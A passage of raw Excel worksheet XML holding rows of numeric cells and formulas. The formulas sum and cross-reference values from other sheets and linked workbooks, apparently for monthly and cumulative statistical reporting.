        <v>64.7336335254563</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]13'!$Q$104</f>
        <v>0</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]13'!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]13'!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'12'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'12'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]13'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]13'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]13'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]13'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]13'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]13'!$V$105</f>
        <v>33.6717339097022</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]13'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]13'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]13'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'12'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'12'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]13'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]13'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]13'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]13'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]13'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]13'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]13'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]13'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]13'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]13'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]13'!$E$16</f>
        <v>5702</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'12'!H31</f>
        <v>63177</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1436184</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]13'!$I$16</f>
        <v>5008.93</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'12'!K31</f>
        <v>62835.63</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1418883.76</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]13'!$L$16</f>
        <v>65770.74</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>87.69432</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'[11]13'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]13'!$E$13</f>
        <v>6023</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'12'!H32</f>
        <v>59578</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1587421</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]13'!$I$13</f>
        <v>4278</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'12'!K32</f>
        <v>46738</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1068216</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]13'!$L$13</f>
        <v>70335.876</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>140.671752</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]13'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]13'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]13'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]13'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]13'!$U$76</f>
        <v>3.84615384615385e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]13'!$V$76</f>
        <v>4.10662824207493e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]13'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]13'!$R$76</f>
        <v>1.2e-10</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]13'!$S$76</f>
        <v>3.42e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]13'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'12'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]13'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'12'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]13'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]13'!$W$77</f>
        <v>0</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]13'!$X$77</f>
        <v>0</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]13'!$Y$77</f>
        <v>19.77</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]13'!$T$77</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]13'!$U$77</f>
        <v>3.20512820512821e-12</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]13'!$V$77</f>
        <v>60.7567243035557</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]13'!$Q$77</f>
        <v>1e-11</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]13'!$R$77</f>
        <v>1e-11</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]13'!$S$77</f>
        <v>5059.82000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]13'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'12'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]13'!$I$50</f>
        <v>869.14</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'12'!K34</f>
        <v>2941.63</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>470144.56</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]13'!$L$15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'[11]13'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'12'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]13'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'12'!K35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G36+'12'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'12'!K36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G37+'12'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'12'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]13'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]13'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]13'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'12'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]13'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'12'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]13'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'12'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'12'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]13'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]13'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]13'!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'12'!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]13'!$V$10</f>
        <v>0</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'12'!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]13'!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'12'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'12'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]13'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]13'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]13'!$R$50</f>
        <v>177.82</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'12'!U39</f>
        <v>3655.02</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>82468.619</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]13'!$V$50</f>
        <v>230</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'12'!X39</f>
        <v>3769</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>82528</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]13'!$Y$50</f>
        <v>1117.566</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'12'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'12'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]13'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]13'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]13'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]13'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]13'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]13'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]13'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]13'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]13'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]13'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]13'!$E$16</f>
        <v>2188</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'12'!H41</f>
        <v>6522</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>131498</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]13'!$I$16</f>
        <v>1107.72</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'12'!K41</f>
        <v>8292.91</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>129686.45</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]13'!$L$16</f>
        <v>24358.85</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>81.1961666666667</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]13'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]13'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]13'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'12'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]13'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'12'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]13'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]13'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]13'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'12'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]13'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'12'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]13'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]13'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]13'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]13'!$R$8</f>
        <v>731.78</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'12'!U42</f>
        <v>7254.36</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>214841.33</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]13'!$V$8</f>
        <v>791</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'12'!X42</f>
        <v>7803</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>210274</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]13'!$Y$8</f>
        <v>7930.196</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]13'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]13'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'12'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]13'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'12'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]13'!$L$14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'[12]13'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'12'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]13'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'12'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]13'!$L$15</f>
        <v>62579.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]13'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]13'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]13'!$R$29</f>
        <v>824.32</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'12'!U44</f>
        <v>4559.98</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>69313.148</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]13'!$V$29</f>
        <v>261</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'12'!X44</f>
        <v>2476</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>68886</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]13'!$Y$29</f>
        <v>4383.437</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]13'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'12'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]13'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'12'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]13'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]13'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]13'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]13'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]13'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]13'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]13'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]13'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]13'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'12'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'12'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]13'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]13'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]13'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'12'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]13'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'12'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]13'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'12'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'12'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]13'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]13'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]13'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'12'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]13'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'12'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]13'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'12'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'12'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
